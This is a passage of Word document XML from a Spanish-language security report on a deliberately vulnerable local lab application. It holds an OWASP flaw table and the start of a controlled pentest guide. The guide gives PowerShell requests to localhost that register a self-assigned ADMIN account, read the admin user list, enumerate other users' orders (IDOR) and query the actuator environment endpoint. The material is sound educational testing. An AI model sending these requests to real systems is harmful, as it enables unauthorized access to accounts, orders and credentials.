            <w:tcW w:w="1701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5B8FB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2"/>
              </w:rPr>
              <w:t>Passwords y claims legibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757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764090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2"/>
              </w:rPr>
              <w:t>BCrypt y secreto externo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="492C4837" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56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7431B0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2"/>
              </w:rPr>
              <w:t>A05</w:t>
            </w:r>
          </w:p>
        </w:tc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A2FF96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2"/>
              </w:rPr>
              <w:t>Injection</w:t>
            </w:r>
          </w:p>
        </w:tc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33DE62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2"/>
              </w:rPr>
              <w:t>SQL y shell concatenados</w:t>
            </w:r>
          </w:p>
        </w:tc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E7149D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2"/>
              </w:rPr>
              <w:t>ProductRepositoryJdbc / ReportService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0EC206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2"/>
              </w:rPr>
              <w:t>Credenciales y whoami</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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3624BD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2"/>
              </w:rPr>
              <w:t>Parámetros; sin shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="7913DB2F" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567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DB52DA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2"/>
              </w:rPr>
              <w:t>A06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474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64C1C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2"/>
              </w:rPr>
              <w:t>Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984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2C2FC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sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Cantidad/stock/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>cartId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> sin control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928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1F1E48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2"/>
              </w:rPr>
              <w:t>CartController</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="12"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="12"/>
              </w:rPr>
              <w:t>CartService</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701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D976BE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2"/>
              </w:rPr>
              <w:t>Carrito inválido o ajeno</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757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AD0E8C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2"/>
              </w:rPr>
              <w:t>Reglas y sesión</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="777F84CD" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56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CCA179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2"/>
              </w:rPr>
              <w:t>A07</w:t>
            </w:r>
          </w:p>
        </w:tc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B5B21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2"/>
              </w:rPr>
              <w:t>Authentication Failures</w:t>
            </w:r>
          </w:p>
        </w:tc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C3AEFE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2"/>
              </w:rPr>
              <w:t>Sin rate limit; token largo</w:t>
            </w:r>
          </w:p>
        </w:tc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1D3459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2"/>
              </w:rPr>
              <w:t>AuthController / AuthService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DE75E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2"/>
              </w:rPr>
              <w:t>Intentos sin bloqueo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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51BAFE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2"/>
              </w:rPr>
              <w:t>Rate limit y expiración</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="2946DAD4" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567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16A734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2"/>
              </w:rPr>
              <w:t>A08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474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19641C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2"/>
              </w:rPr>
              <w:t xml:space="preserve">Data </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="12"/>
              </w:rPr>
              <w:t>Integrity Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984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226780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sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Confianza en nombre/tipo de archivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928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E997D5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2"/>
              </w:rPr>
              <w:t>UploadController</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701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728373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2"/>
              </w:rPr>
              <w:t>Archivo no permitido aceptado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757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2987AD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sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Magic bytes, UUID y privado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="6B85B9DD" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56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45CED5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2"/>
              </w:rPr>
              <w:t>A09</w:t>
            </w:r>
          </w:p>
        </w:tc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1C96B8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2"/>
              </w:rPr>
              <w:t>Logging Failures</w:t>
            </w:r>
          </w:p>
        </w:tc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CF0CC7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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Passwords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> en logs; sin alertas</w:t>
            </w:r>
          </w:p>
        </w:tc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29F28E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2"/>
              </w:rPr>
              <w:t>LegacyLogger</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="12"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="12"/>
              </w:rPr>
              <w:t>SecurityConfig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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4AF745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2"/>
              </w:rPr>
              <w:t>Credenciales en consola</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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FCE90E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2"/>
              </w:rPr>
              <w:t>Enmascarado y alertas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="0F83BCB1" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567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385630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2"/>
              </w:rPr>
              <w:t>A10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474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4F2F81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2"/>
              </w:rPr>
              <w:t>Exceptional Conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984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DE26F3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sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Excepción y </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>stacktrace</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="12"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> al cliente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928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89363B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2"/>
              </w:rPr>
              <w:t>GlobalExceptionHandler</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701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F26AB3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2"/>
              </w:rPr>
              <w:t>Detalles internos en JSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757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F412D8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2"/>
              </w:rPr>
              <w:t>Error genérico e id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BEA8C12" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="000C6A1B" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="774F3FEF" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="10" w:space="1" w:color="20385F"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>10. Guía de pruebas de penetración controladas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3654A186" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Todas las pruebas siguientes deben </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>ejecutarse con la V1 activa en localhost. Los comandos usan PowerShell y archivos inocuos. Cada prueba contiene objetivo, superficie, procedimiento, resultado esperado y un espacio para insertar la evidencia real.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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="1798CE95" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="20385F"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EA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C54FF1" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:b/>
                <w:color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Preparación: </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Ejecutar </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>docker</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>compose</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>pro</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> full up -d --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>build</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">, comprobar </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>docker</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>compose</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>ps</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> y abrir una consola adicional para observar </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>docker</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>compose</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> logs -f </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>backend</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C39F189" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">10.1 A01 - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Broken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F3F295" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Objetivo: demostrar escalamiento de privilegios mediante role=ADMIN, acceso </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>administrativo sin validación de rol e IDOR en pedidos.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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="307BFD91" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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E017D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Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>$reg = @{ username="hacker"; email="hacker@lab.local"; password="Hacker123"; fullName="Hacker"; role="ADMIN" } | ConvertTo-Json</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>Invoke-RestMethod "http://127.0.0.1:8080/api/auth/registro" -Method Post</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> -ContentType "application/json" -Body $reg</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>$login = @{ username="hacker"; password="Hacker123" } | ConvertTo-Json</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>$resp = Invoke-RestMethod "http://127.0.0.1:8080/api/auth/login" -Method Post -ContentType "application/json" -Body $login</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>$token = $resp.da</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>ta.token</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>Invoke-RestMethod "http://127.0.0.1:8080/api/admin/usuarios" -Headers @{ Authorization="Bearer $token" }</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:br/>
              <w:t>1..5 | ForEach-Object { Invoke-RestMethod "http://127.0.0.1:8080/api/pedidos/$_" -Headers @{ Authorization="Bearer $token" } }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FBB5F65" w14:textId="6006B557" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7247769C" w14:textId="08C4757B" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="00742FE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="31A274FF" wp14:editId="0BAAC3CA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-47625</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>436880</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6048375" cy="2488565"/>
            <wp:effectExtent l="0" t="0" r="9525" b="698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2383" w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Resultado es</w:t>
      </w:r>
      <w:r w:rsidR="001E2383" w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">perado: el registro conserva el rol enviado por el cliente; el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001E2383" w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>endpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001E2383" w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> administrativo devuelve usuarios con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001E2383" w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>passwords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001E2383" w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>; la enumeración permite leer pedidos que no pertenecen al usuario autenticado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D690FF" w14:textId="6D8A5901" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:before="40" w:after="140"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:i/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="17"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Escalamiento a ADMIN y acceso no autorizado a usuarios o pedidos.</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="16"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br/>
        <w:t>Fuente: elaboración propia a partir de la ejecución del laboratorio local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8571B5" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>10.2 A02 - Security Misconfiguration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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="5E108184" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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81C3F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Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>Invoke-RestMethod "http://127.0.0.1:8080/actuator/env" | ConvertTo-Json -Depth</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
